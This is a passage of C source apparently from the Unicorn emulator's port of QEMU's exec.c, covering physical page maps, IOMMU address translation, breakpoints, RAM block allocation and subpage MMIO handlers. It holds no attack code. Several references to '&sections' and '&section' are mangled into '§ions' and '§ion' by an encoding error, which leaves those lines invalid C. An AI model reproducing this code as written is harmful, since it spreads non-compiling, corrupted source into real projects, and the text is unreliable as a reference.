lp->skip = 0; lp->ptr = leaf; *index += step; *nb -= step; } else { phys_page_set_level(map, lp, index, nb, leaf, level - 1); } ++lp; } } static void phys_page_set(AddressSpaceDispatch *d, hwaddr index, uint64_t nb, uint16_t leaf) { #ifdef TARGET_ARM struct uc_struct *uc = d->uc; #endif /* Wildly overreserve - it doesn't matter much. */ phys_map_node_reserve(d, &d->map, 3 * P_L2_LEVELS); phys_page_set_level(&d->map, &d->phys_map, &index, &nb, leaf, P_L2_LEVELS - 1); } /* Compact a non leaf page entry. Simply detect that the entry has a single child, * and update our entry so we can skip it and go directly to the destination. */ static void phys_page_compact(struct uc_struct *uc, PhysPageEntry *lp, Node *nodes) { unsigned valid_ptr = P_L2_SIZE; int valid = 0; PhysPageEntry *p; int i; if (lp->ptr == PHYS_MAP_NODE_NIL) { return; } p = nodes[lp->ptr]; for (i = 0; i < P_L2_SIZE; i++) { if (p[i].ptr == PHYS_MAP_NODE_NIL) { continue; } valid_ptr = i; valid++; if (p[i].skip) { phys_page_compact(uc, &p[i], nodes); } } /* We can only compress if there's only one child. */ if (valid != 1) { return; } assert(valid_ptr < P_L2_SIZE); /* Don't compress if it won't fit in the # of bits we have. */ if (P_L2_LEVELS >= (1 << 6) && lp->skip + p[valid_ptr].skip >= (1 << 6)) { return; } lp->ptr = p[valid_ptr].ptr; if (!p[valid_ptr].skip) { /* If our only child is a leaf, make this a leaf. */ /* By design, we should have made this node a leaf to begin with so we * should never reach here. * But since it's so simple to handle this, let's do it just in case we * change this rule. */ lp->skip = 0; } else { lp->skip += p[valid_ptr].skip; } } void address_space_dispatch_compact(AddressSpaceDispatch *d) { if (d->phys_map.skip) { phys_page_compact(d->uc, &d->phys_map, d->map.nodes); } } static inline bool section_covers_addr(const MemoryRegionSection *section, hwaddr addr) { /* Memory topology clips a memory region to [0, 2^64); size.hi > 0 means * the section must cover the entire address space. */ return int128_gethi(section->size) || range_covers_byte(section->offset_within_address_space, int128_getlo(section->size), addr); } static MemoryRegionSection *phys_page_find(AddressSpaceDispatch *d, hwaddr addr) { #ifdef TARGET_ARM struct uc_struct *uc = d->uc; #endif PhysPageEntry lp = d->phys_map, *p; Node *nodes = d->map.nodes; MemoryRegionSection *sections = d->map.sections; hwaddr index = addr >> TARGET_PAGE_BITS; int i; for (i = P_L2_LEVELS; lp.skip && (i -= lp.skip) >= 0;) { if (lp.ptr == PHYS_MAP_NODE_NIL) { return §ions[PHYS_SECTION_UNASSIGNED]; } p = nodes[lp.ptr]; lp = p[(index >> (i * P_L2_BITS)) & (P_L2_SIZE - 1)]; } if (section_covers_addr(§ions[lp.ptr], addr)) { return §ions[lp.ptr]; } else { return §ions[PHYS_SECTION_UNASSIGNED]; } } /* Called from RCU critical section */ static MemoryRegionSection *address_space_lookup_region(AddressSpaceDispatch *d, hwaddr addr, bool resolve_subpage) { #ifdef TARGET_ARM struct uc_struct *uc = d->uc; #endif MemoryRegionSection *section = d->mru_section; subpage_t *subpage; if (!section || section == &d->map.sections[PHYS_SECTION_UNASSIGNED] || !section_covers_addr(section, addr)) { section = phys_page_find(d, addr); d->mru_section = section; } if (resolve_subpage && section->mr->subpage) { subpage = container_of(section->mr, subpage_t, iomem); section = &d->map.sections[subpage->sub_section[SUBPAGE_IDX(addr)]]; } return section; } /* Called from RCU critical section */ static MemoryRegionSection * address_space_translate_internal(AddressSpaceDispatch *d, hwaddr addr, hwaddr *xlat, hwaddr *plen, bool resolve_subpage) { MemoryRegionSection *section; MemoryRegion *mr; Int128 diff; section = address_space_lookup_region(d, addr, resolve_subpage); /* Compute offset within MemoryRegionSection */ addr -= section->offset_within_address_space; /* Compute offset within MemoryRegion */ *xlat = addr + section->offset_within_region; mr = section->mr; /* MMIO registers can be expected to perform full-width accesses based only * on their address, without considering adjacent registers that could * decode to completely different MemoryRegions. When such registers * exist (e.g. I/O ports 0xcf8 and 0xcf9 on most PC chipsets), MMIO * regions overlap wildly. For this reason we cannot clamp the accesses * here. * * If the length is small (as is the case for address_space_ldl/stl), * everything works fine. If the incoming length is large, however, * the caller really has to do the clamping through memory_access_size. */ if (memory_region_is_ram(mr)) { diff = int128_sub(section->size, int128_make64(addr)); *plen = int128_get64(int128_min(diff, int128_make64(*plen))); } return section; } /** * address_space_translate_iommu - translate an address through an IOMMU * memory region and then through the target address space. * * @iommu_mr: the IOMMU memory region that we start the translation from * @addr: the address to be translated through the MMU * @xlat: the translated address offset within the destination memory region. * It cannot be %NULL. * @plen_out: valid read/write length of the translated address. It * cannot be %NULL. * @page_mask_out: page mask for the translated address. This * should only be meaningful for IOMMU translated * addresses, since there may be huge pages that this bit * would tell. It can be %NULL if we don't care about it. * @is_write: whether the translation operation is for write * @is_mmio: whether this can be MMIO, set true if it can * @target_as: the address space targeted by the IOMMU * @attrs: transaction attributes * * This function is called from RCU critical section. It is the common * part of flatview_do_translate and address_space_translate_cached. */ static MemoryRegionSection address_space_translate_iommu(IOMMUMemoryRegion *iommu_mr, hwaddr *xlat, hwaddr *plen_out, hwaddr *page_mask_out, bool is_write, bool is_mmio, AddressSpace **target_as, MemTxAttrs attrs) { MemoryRegionSection *section; hwaddr page_mask = (hwaddr)-1; MemoryRegion *mr = MEMORY_REGION(iommu_mr); do { hwaddr addr = *xlat; IOMMUMemoryRegionClass *imrc = memory_region_get_iommu_class_nocheck(iommu_mr); int iommu_idx = 0; IOMMUTLBEntry iotlb; if (imrc->attrs_to_index) { iommu_idx = imrc->attrs_to_index(iommu_mr, attrs); } iotlb = imrc->translate(iommu_mr, addr, is_write ? IOMMU_WO : IOMMU_RO, iommu_idx); if (!(iotlb.perm & (1 << is_write))) { goto unassigned; } addr = ((iotlb.translated_addr & ~iotlb.addr_mask) | (addr & iotlb.addr_mask)); page_mask &= iotlb.addr_mask; *plen_out = MIN(*plen_out, (addr | iotlb.addr_mask) - addr + 1); *target_as = iotlb.target_as; section = address_space_translate_internal( address_space_to_dispatch(iotlb.target_as), addr, xlat, plen_out, is_mmio); iommu_mr = memory_region_get_iommu(section->mr); } while (unlikely(iommu_mr)); if (page_mask_out) { *page_mask_out = page_mask; } return *section; unassigned: return (MemoryRegionSection) { .mr = &(mr->uc->io_mem_unassigned) }; } /** * flatview_do_translate - translate an address in FlatView * * @fv: the flat view that we want to translate on * @addr: the address to be translated in above address space * @xlat: the translated address offset within memory region. It * cannot be @NULL. * @plen_out: valid read/write length of the translated address. It * can be @NULL when we don't care about it. * @page_mask_out: page mask for the translated address. This * should only be meaningful for IOMMU translated * addresses, since there may be huge pages that this bit * would tell. It can be @NULL if we don't care about it. * @is_write: whether the translation operation is for write * @is_mmio: whether this can be MMIO, set true if it can * @target_as: the address space targeted by the IOMMU * @attrs: memory transaction attributes * * This function is called from RCU critical section */ static MemoryRegionSection flatview_do_translate(struct uc_struct *uc, FlatView *fv, hwaddr addr, hwaddr *xlat, hwaddr *plen_out, hwaddr *page_mask_out, bool is_write, bool is_mmio, AddressSpace **target_as, MemTxAttrs attrs) { MemoryRegionSection *section; IOMMUMemoryRegion *iommu_mr; hwaddr plen = (hwaddr)(-1); if (!plen_out) { plen_out = &plen; } section = address_space_translate_internal( flatview_to_dispatch(fv), addr, xlat, plen_out, is_mmio); iommu_mr = memory_region_get_iommu(section->mr); if (unlikely(iommu_mr)) { return address_space_translate_iommu(iommu_mr, xlat, plen_out, page_mask_out, is_write, is_mmio, target_as, attrs); } if (page_mask_out) { /* Not behind an IOMMU, use default page size. */ *page_mask_out = ~TARGET_PAGE_MASK; } return *section; } /* Called from RCU critical section */ MemoryRegion *flatview_translate(struct uc_struct *uc, FlatView *fv, hwaddr addr, hwaddr *xlat, hwaddr *plen, bool is_write, MemTxAttrs attrs) { MemoryRegion *mr; MemoryRegionSection section; AddressSpace *as = NULL; /* This can be MMIO, so setup MMIO bit. */ section = flatview_do_translate(uc, fv, addr, xlat, plen, NULL, is_write, true, &as, attrs); mr = section.mr; return mr; } /* Called from RCU critical section */ MemoryRegionSection * address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr, hwaddr *xlat, hwaddr *plen, MemTxAttrs attrs, int *prot) { MemoryRegionSection *section; IOMMUMemoryRegion *iommu_mr; IOMMUMemoryRegionClass *imrc; IOMMUTLBEntry iotlb; int iommu_idx; AddressSpaceDispatch *d = cpu->cpu_ases[asidx].memory_dispatch; for (;;) { section = address_space_translate_internal(d, addr, &addr, plen, false); iommu_mr = memory_region_get_iommu(section->mr); if (!iommu_mr) { break; } imrc = memory_region_get_iommu_class_nocheck(iommu_mr); iommu_idx = imrc->attrs_to_index(iommu_mr, attrs); // tcg_register_iommu_notifier(cpu, iommu_mr, iommu_idx); /* We need all the permissions, so pass IOMMU_NONE so the IOMMU * doesn't short-cut its translation table walk. */ iotlb = imrc->translate(iommu_mr, addr, IOMMU_NONE, iommu_idx); addr = ((iotlb.translated_addr & ~iotlb.addr_mask) | (addr & iotlb.addr_mask)); /* Update the caller's prot bits to remove permissions the IOMMU * is giving us a failure response for. If we get down to no * permissions left at all we can give up now. */ if (!(iotlb.perm & IOMMU_RO)) { *prot &= ~(PAGE_READ | PAGE_EXEC); } if (!(iotlb.perm & IOMMU_WO)) { *prot &= ~PAGE_WRITE; } if (!*prot) { goto translate_fail; } d = flatview_to_dispatch(address_space_to_flatview(iotlb.target_as)); } assert(!(memory_region_get_iommu(section->mr) != NULL)); *xlat = addr; // Unicorn: // If there is no memory mapped but still we start emulation, we will get // a default memory region section and it would be marked as an IO memory // in cputlb which prevents further fecthing and execution. // // The reason we set prot to 0 here is not to setting protection but to notify // the outer function to add a new **blank** tlb which will never be hitted. if (!memory_region_is_ram(section->mr) && section == &d->map.sections[PHYS_SECTION_UNASSIGNED]) { *prot = 0; } return section; translate_fail: return &d->map.sections[PHYS_SECTION_UNASSIGNED]; } CPUState *qemu_get_cpu(struct uc_struct *uc, int index) { CPUState *cpu = uc->cpu; if (cpu->cpu_index == index) { return cpu; } return NULL; } void cpu_address_space_init(CPUState *cpu, int asidx, MemoryRegion *mr) { /* Target code should have set num_ases before calling us */ assert(asidx < cpu->num_ases); if (!cpu->cpu_ases) { cpu->cpu_ases = g_new0(CPUAddressSpace, cpu->num_ases); cpu->cpu_ases[0].cpu = cpu; cpu->cpu_ases[0].as = &(cpu->uc->address_space_memory); cpu->cpu_ases[0].tcg_as_listener.commit = tcg_commit; memory_listener_register(&(cpu->cpu_ases[0].tcg_as_listener), cpu->cpu_ases[0].as); } /* arm security memory */ if (asidx > 0) { cpu->cpu_ases[asidx].cpu = cpu; cpu->cpu_ases[asidx].as = &(cpu->uc->address_space_memory); cpu->cpu_ases[asidx].tcg_as_listener.commit = tcg_commit; memory_listener_register(&(cpu->cpu_ases[asidx].tcg_as_listener), cpu->cpu_ases[asidx].as); } } AddressSpace *cpu_get_address_space(CPUState *cpu, int asidx) { /* only one AddressSpace. */ return cpu->cpu_ases[0].as; } void cpu_exec_unrealizefn(CPUState *cpu) { } void cpu_exec_initfn(CPUState *cpu) { cpu->num_ases = 1; cpu->as = &(cpu->uc->address_space_memory); cpu->memory = cpu->uc->system_memory; } void cpu_exec_realizefn(CPUState *cpu) { CPUClass *cc = CPU_GET_CLASS(cpu); cc->tcg_initialize(cpu->uc); tlb_init(cpu); } void tb_invalidate_phys_addr(AddressSpace *as, hwaddr addr, MemTxAttrs attrs) { ram_addr_t ram_addr; MemoryRegion *mr; hwaddr l = 1; mr = address_space_translate(as, addr, &addr, &l, false, attrs); if (!memory_region_is_ram(mr)) { return; } ram_addr = memory_region_get_ram_addr(mr) + addr; tb_invalidate_phys_page_range(as->uc, ram_addr, ram_addr + 1); } static void breakpoint_invalidate(CPUState *cpu, target_ulong pc) { /* * There may not be a virtual to physical translation for the pc * right now, but there may exist cached TB for this pc. * Flush the whole TB cache to force re-translation of such TBs. * This is heavyweight, but we're debugging anyway. */ tb_flush(cpu); } /* Add a watchpoint. */ int cpu_watchpoint_insert(CPUState *cpu, vaddr addr, vaddr len, int flags, CPUWatchpoint **watchpoint) { #if 0 CPUWatchpoint *wp; /* forbid ranges which are empty or run off the end of the address space */ if (len == 0 || (addr + len - 1) < addr) { error_report("tried to set invalid watchpoint at %" VADDR_PRIx ", len=%" VADDR_PRIu, addr, len); return -EINVAL; } wp = g_malloc(sizeof(*wp)); wp->vaddr = addr; wp->len = len; wp->flags = flags; /* keep all GDB-injected watchpoints in front */ if (flags & BP_GDB) { QTAILQ_INSERT_HEAD(&cpu->watchpoints, wp, entry); } else { QTAILQ_INSERT_TAIL(&cpu->watchpoints, wp, entry); } tlb_flush_page(cpu, addr); if (watchpoint) *watchpoint = wp; #endif return 0; } /* Remove a specific watchpoint by reference. */ void cpu_watchpoint_remove_by_ref(CPUState *cpu, CPUWatchpoint *watchpoint) { #if 0 QTAILQ_REMOVE(&cpu->watchpoints, watchpoint, entry); tlb_flush_page(cpu, watchpoint->vaddr); g_free(watchpoint); #endif } /* Remove all matching watchpoints. */ void cpu_watchpoint_remove_all(CPUState *cpu, int mask) { #if 0 CPUWatchpoint *wp, *next; QTAILQ_FOREACH_SAFE(wp, &cpu->watchpoints, entry, next) { if (wp->flags & mask) { cpu_watchpoint_remove_by_ref(cpu, wp); } } #endif } /* Return flags for watchpoints that match addr + prot. */ int cpu_watchpoint_address_matches(CPUState *cpu, vaddr addr, vaddr len) { #if 0 CPUWatchpoint *wp; int ret = 0; QTAILQ_FOREACH(wp, &cpu->watchpoints, entry) { if (watchpoint_address_matches(wp, addr, TARGET_PAGE_SIZE)) { ret |= wp->flags; } } return ret; #endif return 0; } /* Add a breakpoint. */ int cpu_breakpoint_insert(CPUState *cpu, vaddr pc, int flags, CPUBreakpoint **breakpoint) { CPUBreakpoint *bp; bp = g_malloc(sizeof(*bp)); bp->pc = pc; bp->flags = flags; /* keep all GDB-injected breakpoints in front */ if (flags & BP_GDB) { QTAILQ_INSERT_HEAD(&cpu->breakpoints, bp, entry); } else { QTAILQ_INSERT_TAIL(&cpu->breakpoints, bp, entry); } breakpoint_invalidate(cpu, pc); if (breakpoint) { *breakpoint = bp; } return 0; } /* Remove a specific breakpoint. */ int cpu_breakpoint_remove(CPUState *cpu, vaddr pc, int flags) { CPUBreakpoint *bp; QTAILQ_FOREACH(bp, &cpu->breakpoints, entry) { if (bp->pc == pc && bp->flags == flags) { cpu_breakpoint_remove_by_ref(cpu, bp); return 0; } } return -ENOENT; } /* Remove a specific breakpoint by reference. */ void cpu_breakpoint_remove_by_ref(CPUState *cpu, CPUBreakpoint *breakpoint) { QTAILQ_REMOVE(&cpu->breakpoints, breakpoint, entry); breakpoint_invalidate(cpu, breakpoint->pc); g_free(breakpoint); } /* Remove all matching breakpoints. */ void cpu_breakpoint_remove_all(CPUState *cpu, int mask) { CPUBreakpoint *bp, *next; QTAILQ_FOREACH_SAFE(bp, &cpu->breakpoints, entry, next) { if (bp->flags & mask) { cpu_breakpoint_remove_by_ref(cpu, bp); } } } void cpu_abort(CPUState *cpu, const char *fmt, ...) { abort(); } /* Called from RCU critical section */ static RAMBlock *qemu_get_ram_block(struct uc_struct *uc, ram_addr_t addr) { RAMBlock *block; block = uc->ram_list.mru_block; if (block && addr - block->offset < block->max_length) { return block; } RAMBLOCK_FOREACH(block) { if (addr - block->offset < block->max_length) { goto found; } } fprintf(stderr, "Bad ram offset %" PRIx64 "\n", (uint64_t)addr); abort(); found: uc->ram_list.mru_block = block; return block; } /* Note: start and end must be within the same ram block. */ bool cpu_physical_memory_test_and_clear_dirty(ram_addr_t start, ram_addr_t length, unsigned client) { return false; } /* Called from RCU critical section */ hwaddr memory_region_section_get_iotlb(CPUState *cpu, MemoryRegionSection *section) { AddressSpaceDispatch *d = flatview_to_dispatch(section->fv); return section - d->map.sections; } static int subpage_register(struct uc_struct *uc, subpage_t *mmio, uint32_t start, uint32_t end, uint16_t section); static subpage_t *subpage_init(struct uc_struct *, FlatView *fv, hwaddr base); static void *(*phys_mem_alloc)(struct uc_struct *uc, size_t size, uint64_t *align) = qemu_anon_ram_alloc; static uint16_t phys_section_add(struct uc_struct *uc, PhysPageMap *map, MemoryRegionSection *section) { /* The physical section number is ORed with a page-aligned * pointer to produce the iotlb entries. Thus it should * never overflow into the page-aligned value. */ assert(map->sections_nb < TARGET_PAGE_SIZE); if (map->sections_nb == map->sections_nb_alloc) { map->sections_nb_alloc = MAX(map->sections_nb_alloc * 2, 16); map->sections = g_renew(MemoryRegionSection, map->sections, map->sections_nb_alloc); } map->sections[map->sections_nb] = *section; return map->sections_nb++; } static void phys_section_destroy(MemoryRegion *mr) { bool have_sub_page = mr->subpage; if (have_sub_page) { subpage_t *subpage = container_of(mr, subpage_t, iomem); // object_unref(OBJECT(&subpage->iomem)); g_free(subpage); } } static void phys_sections_free(PhysPageMap *map) { while (map->sections_nb > 0) { MemoryRegionSection *section = &map->sections[--map->sections_nb]; phys_section_destroy(section->mr); } g_free(map->sections); g_free(map->nodes); } static void register_subpage(struct uc_struct *uc, FlatView *fv, MemoryRegionSection *section) { AddressSpaceDispatch *d = flatview_to_dispatch(fv); subpage_t *subpage; hwaddr base = section->offset_within_address_space & TARGET_PAGE_MASK; MemoryRegionSection *existing = phys_page_find(d, base); MemoryRegionSection subsection = { .offset_within_address_space = base, .size = int128_make64(TARGET_PAGE_SIZE), }; hwaddr start, end; assert(existing->mr->subpage || existing->mr == &(section->mr->uc->io_mem_unassigned)); if (!(existing->mr->subpage)) { subpage = subpage_init(uc, fv, base); subsection.fv = fv; subsection.mr = &subpage->iomem; phys_page_set(d, base >> TARGET_PAGE_BITS, 1, phys_section_add(uc, &d->map, &subsection)); } else { subpage = container_of(existing->mr, subpage_t, iomem); } start = section->offset_within_address_space & ~TARGET_PAGE_MASK; end = start + int128_get64(section->size) - 1; subpage_register(uc, subpage, start, end, phys_section_add(uc, &d->map, section)); } static void register_multipage(struct uc_struct *uc, FlatView *fv, MemoryRegionSection *section) { AddressSpaceDispatch *d = flatview_to_dispatch(fv); hwaddr start_addr = section->offset_within_address_space; uint16_t section_index = phys_section_add(uc, &d->map, section); uint64_t num_pages = int128_get64(int128_rshift(section->size, TARGET_PAGE_BITS)); assert(num_pages); phys_page_set(d, start_addr >> TARGET_PAGE_BITS, num_pages, section_index); } /* * The range in *section* may look like this: * * |s|PPPPPPP|s| * * where s stands for subpage and P for page. */ void flatview_add_to_dispatch(struct uc_struct *uc, FlatView *fv, MemoryRegionSection *section) { MemoryRegionSection remain = *section; Int128 page_size = int128_make64(TARGET_PAGE_SIZE); /* register first subpage */ if (remain.offset_within_address_space & ~TARGET_PAGE_MASK) { uint64_t left = TARGET_PAGE_ALIGN(remain.offset_within_address_space) - remain.offset_within_address_space; MemoryRegionSection now = remain; now.size = int128_min(int128_make64(left), now.size); register_subpage(uc, fv, &now); if (int128_eq(remain.size, now.size)) { return; } remain.size = int128_sub(remain.size, now.size); remain.offset_within_address_space += int128_get64(now.size); remain.offset_within_region += int128_get64(now.size); } /* register whole pages */ if (int128_ge(remain.size, page_size)) { MemoryRegionSection now = remain; now.size = int128_and(now.size, int128_neg(page_size)); register_multipage(uc, fv, &now); if (int128_eq(remain.size, now.size)) { return; } remain.size = int128_sub(remain.size, now.size); remain.offset_within_address_space += int128_get64(now.size); remain.offset_within_region += int128_get64(now.size); } /* register last subpage */ register_subpage(uc, fv, &remain); } static ram_addr_t find_ram_offset_last(struct uc_struct *uc, ram_addr_t size) { RAMBlock *block; ram_addr_t result = 0; RAMBLOCK_FOREACH(block) { result = MAX(block->offset + block->max_length, result); } if (result + size > RAM_ADDR_MAX) { abort(); } return result; } /* Allocate space within the ram_addr_t space that governs the * dirty bitmaps. * Called with the ramlist lock held. */ static ram_addr_t find_ram_offset(struct uc_struct *uc, ram_addr_t size) { RAMBlock *block, *next_block; ram_addr_t offset = RAM_ADDR_MAX, mingap = RAM_ADDR_MAX; assert(size != 0); /* it would hand out same offset multiple times */ if (QLIST_EMPTY_RCU(&uc->ram_list.blocks)) { return 0; } if (!uc->ram_list.freed) { return find_ram_offset_last(uc, size); } RAMBLOCK_FOREACH(block) { ram_addr_t candidate, next = RAM_ADDR_MAX; /* Align blocks to start on a 'long' in the bitmap * which makes the bitmap sync'ing take the fast path. */ candidate = block->offset + block->max_length; candidate = ROUND_UP(candidate, BITS_PER_LONG << TARGET_PAGE_BITS); /* Search for the closest following block * and find the gap. */ RAMBLOCK_FOREACH(next_block) { if (next_block->offset >= candidate) { next = MIN(next, next_block->offset); } } /* If it fits remember our place and remember the size * of gap, but keep going so that we might find a smaller * gap to fill so avoiding fragmentation. */ if (next - candidate >= size && next - candidate < mingap) { offset = candidate; mingap = next - candidate; } } if (offset == RAM_ADDR_MAX) { fprintf(stderr, "Failed to find gap of requested size: %" PRIu64 "\n", (uint64_t)size); abort(); } return offset; } void *qemu_ram_get_host_addr(RAMBlock *rb) { return rb->host; } ram_addr_t qemu_ram_get_offset(RAMBlock *rb) { return rb->offset; } ram_addr_t qemu_ram_get_used_length(RAMBlock *rb) { return rb->used_length; } bool qemu_ram_is_shared(RAMBlock *rb) { return rb->flags & RAM_SHARED; } size_t qemu_ram_pagesize(RAMBlock *rb) { return rb->page_size; } static void ram_block_add(struct uc_struct *uc, RAMBlock *new_block) { RAMBlock *block; RAMBlock *last_block = NULL; new_block->offset = find_ram_offset(uc, new_block->max_length); if (!new_block->host) { new_block->host = phys_mem_alloc(uc, new_block->max_length, &new_block->mr->align); if (!new_block->host) { // mmap fails. uc->invalid_error = UC_ERR_NOMEM; // error_setg_errno(errp, errno, // "cannot set up guest memory '%s'", // memory_region_name(new_block->mr)); return; } // memory_try_enable_merging(new_block->host, new_block->max_length); } /* Keep the list sorted from biggest to smallest block. Unlike QTAILQ, * QLIST (which has an RCU-friendly variant) does not have insertion at * tail, so save the last element in last_block. */ RAMBLOCK_FOREACH(block) { last_block = block; if (block->max_length < new_block->max_length) { break; } } if (block) { QLIST_INSERT_BEFORE_RCU(block, new_block, next); } else if (last_block) { QLIST_INSERT_AFTER_RCU(last_block, new_block, next); } else { /* list is empty */ QLIST_INSERT_HEAD_RCU(&uc->ram_list.blocks, new_block, next); } uc->ram_list.mru_block = NULL; /* Write list before version */ //smp_wmb(); cpu_physical_memory_set_dirty_range(new_block->offset, new_block->used_length, DIRTY_CLIENTS_ALL); } RAMBlock *qemu_ram_alloc_from_ptr(struct uc_struct *uc, ram_addr_t size, void *host, MemoryRegion *mr) { RAMBlock *new_block; ram_addr_t max_size = size; // Don't resize pre-alloced memory as they are given by users. if (!host) { size = HOST_PAGE_ALIGN(uc, size); max_size = HOST_PAGE_ALIGN(uc, max_size); } new_block = g_malloc0(sizeof(*new_block)); if (new_block == NULL) return NULL; new_block->mr = mr; new_block->used_length = size; new_block->max_length = max_size; assert(max_size >= size); new_block->page_size = uc->qemu_real_host_page_size; new_block->host = host; if (host) { new_block->flags |= RAM_PREALLOC; } uc->invalid_addr = UC_ERR_OK; ram_block_add(mr->uc, new_block); if (uc->invalid_error != UC_ERR_OK) { g_free(new_block); return NULL; } return new_block; } RAMBlock *qemu_ram_alloc(struct uc_struct *uc, ram_addr_t size, MemoryRegion *mr) { return qemu_ram_alloc_from_ptr(uc, size, NULL, mr); } static void reclaim_ramblock(struct uc_struct *uc, RAMBlock *block) { if (block->flags & RAM_PREALLOC) { ; } else if (false) { } else { qemu_anon_ram_free(uc, block->host, block->max_length); } g_free(block); } void qemu_ram_free(struct uc_struct *uc, RAMBlock *block) { if (!block) { return; } //if (block->host) { // ram_block_notify_remove(block->host, block->max_length); //} QLIST_REMOVE_RCU(block, next); uc->ram_list.mru_block = NULL; uc->ram_list.freed = true; /* Write list before version */ //smp_wmb(); // call_rcu(block, reclaim_ramblock, rcu); reclaim_ramblock(uc, block); } /* Return a host pointer to ram allocated with qemu_ram_alloc. * This should not be used for general purpose DMA. Use address_space_map * or address_space_rw instead. For local memory (e.g. video ram) that the * device owns, use memory_region_get_ram_ptr. * * Called within RCU critical section. */ void *qemu_map_ram_ptr(struct uc_struct *uc, RAMBlock *ram_block, ram_addr_t addr) { RAMBlock *block = ram_block; if (block == NULL) { block = qemu_get_ram_block(uc, addr); addr -= block->offset; } return ramblock_ptr(block, addr); } /* Return a host pointer to guest's ram. Similar to qemu_map_ram_ptr * but takes a size argument. * * Called within RCU critical section. */ static void *qemu_ram_ptr_length(struct uc_struct *uc, RAMBlock *ram_block, ram_addr_t addr, hwaddr *size, bool lock) { RAMBlock *block = ram_block; if (*size == 0) { return NULL; } if (block == NULL) { block = qemu_get_ram_block(uc, addr); addr -= block->offset; } *size = MIN(*size, block->max_length - addr); return ramblock_ptr(block, addr); } /* Return the offset of a hostpointer within a ramblock */ ram_addr_t qemu_ram_block_host_offset(RAMBlock *rb, void *host) { ram_addr_t res = (uint8_t *)host - (uint8_t *)rb->host; assert((uintptr_t)host >= (uintptr_t)rb->host); assert(res < rb->max_length); return res; } /* * Translates a host ptr back to a RAMBlock, a ram_addr and an offset * in that RAMBlock. * * ptr: Host pointer to look up * round_offset: If true round the result offset down to a page boundary * *ram_addr: set to result ram_addr * *offset: set to result offset within the RAMBlock * * Returns: RAMBlock (or NULL if not found) * * By the time this function returns, the returned pointer is not protected * by RCU anymore. If the caller is not within an RCU critical section and * does not hold the iothread lock, it must have other means of protecting the * pointer, such as a reference to the region that includes the incoming * ram_addr_t. */ RAMBlock *qemu_ram_block_from_host(struct uc_struct *uc, void *ptr, bool round_offset, ram_addr_t *offset) { RAMBlock *block; uint8_t *host = ptr; block = uc->ram_list.mru_block; if (block && block->host && host - block->host < block->max_length) { goto found; } RAMBLOCK_FOREACH(block) { /* This case append when the block is not mapped. */ if (block->host == NULL) { continue; } if (host - block->host < block->max_length) { goto found; } } return NULL; found: *offset = (host - block->host); if (round_offset) { *offset &= TARGET_PAGE_MASK; } return block; } /* Some of the softmmu routines need to translate from a host pointer (typically a TLB entry) back to a ram offset. */ ram_addr_t qemu_ram_addr_from_host(struct uc_struct *uc, void *ptr) { RAMBlock *block; ram_addr_t offset; block = qemu_ram_block_from_host(uc, ptr, false, &offset); if (!block) { return RAM_ADDR_INVALID; } return block->offset + offset; } /* Generate a debug exception if a watchpoint has been hit. */ void cpu_check_watchpoint(CPUState *cpu, vaddr addr, vaddr len, MemTxAttrs attrs, int flags, uintptr_t ra) { } static MemTxResult flatview_read(struct uc_struct *uc, FlatView *fv, hwaddr addr, MemTxAttrs attrs, void *buf, hwaddr len); static MemTxResult flatview_write(struct uc_struct *, FlatView *fv, hwaddr addr, MemTxAttrs attrs, const void *buf, hwaddr len); static bool flatview_access_valid(struct uc_struct *uc, FlatView *fv, hwaddr addr, hwaddr len, bool is_write, MemTxAttrs attrs); static MemTxResult subpage_read(struct uc_struct *uc, void *opaque, hwaddr addr, uint64_t *data, unsigned len, MemTxAttrs attrs) { subpage_t *subpage = opaque; uint8_t buf[8]; MemTxResult res; #if defined(DEBUG_SUBPAGE) printf("%s: subpage %p len %u addr " TARGET_FMT_plx "\n", __func__, subpage, len, addr); #endif res = flatview_read(uc, subpage->fv, addr + subpage->base, attrs, buf, len); if (res) { return res; } *data = ldn_p(buf, len); return MEMTX_OK; } static MemTxResult subpage_write(struct uc_struct *uc, void *opaque, hwaddr addr, uint64_t value, unsigned len, MemTxAttrs attrs) { subpage_t *subpage = opaque; uint8_t buf[8]; #if defined(DEBUG_SUBPAGE) printf("%s: subpage %p len %u addr " TARGET_FMT_plx " value %"PRIx64"\n", __func__, subpage, len, addr, value); #endif stn_p(buf, len, value); return flatview_write(uc, subpage->fv, addr + subpage->base, attrs, buf, len); } static bool subpage_accepts(struct uc_struct *uc, void *opaque, hwaddr addr, unsigned len, bool is_write, MemTxAttrs attrs) { subpage_t *subpage = opaque; #if defined(DEBUG_SUBPAGE) printf("%s: subpage %p %c len %u addr " TARGET_FMT_plx "\n", __func__, subpage, is_write ? 'w' : 'r', len, addr); #endif return flatview_access_valid(uc, subpage->fv, addr + subpage->base, len, is_write, attrs); } static const MemoryRegionOps subpage_ops = { .read_with_attrs = subpage_read, .write_with_attrs = subpage_write, .impl.min_access_size = 1, .impl.max_access_size = 8, .valid.min_access_size = 1, .valid.max_access_size = 8, .valid.accepts = subpage_accepts, .endianness = DEVICE_NATIVE_ENDIAN, }; static int subpage_register(struct uc_struct *uc, subpage_t *mmio, uint32_t start, uint32_t end, uint16_t section) { int idx, eidx; if (start >= TARGET_PAGE_SIZE || end >= TARGET_PAGE_SIZE) return -1; idx = SUBPAGE_IDX(start); eidx = SUBPAGE_IDX(end); #if defined(DEBUG_SUBPAGE) printf("%s: %p start %08x end %08x idx %08x eidx %08x section %d\n", __func__, mmio, start, end, idx, eidx, section); #endif for (; idx <= eidx; idx++) { mmio->sub_section[idx] = section; } return 0; } static subpage_t *subpage_init(struct uc_struct *uc, FlatView *fv, hwaddr base) { subpage_t *mmio; /* mmio->sub_section is set to PHYS_SECTION_UNASSIGNED with g_malloc0 */ mmio = g_malloc0(sizeof(subpage_t) + TARGET_PAGE_SIZE * sizeof(uint16_t)); mmio->fv = fv; mmio->base = base; memory_region_init_io(fv->root->uc, &mmio->iomem, &subpage_ops, mmio, TARGET_PAGE_SIZE); mmio->iomem.subpage = true; #if defined(DEBUG_SUBPAGE) printf("%s: %p base " TARGET_FMT_plx " len %08x\n", __func__, mmio, base, TARGET_PAGE_SIZE); #endif return mmio; } static uint16_t dummy_section(struct uc_struct *uc, PhysPageMap *map, FlatView *fv, MemoryRegion *mr) { assert(fv); MemoryRegionSection section = { .fv = fv, .mr = mr, .offset_within_address_space = 0, .offset_within_region = 0, .size = int128_2_64(), }; return phys_section_add(uc, map, §ion); } MemoryRegionSection *iotlb_to_section(CPUState *cpu, hwaddr index, MemTxAttrs attrs) { #ifdef TARGET_ARM struct uc_struct 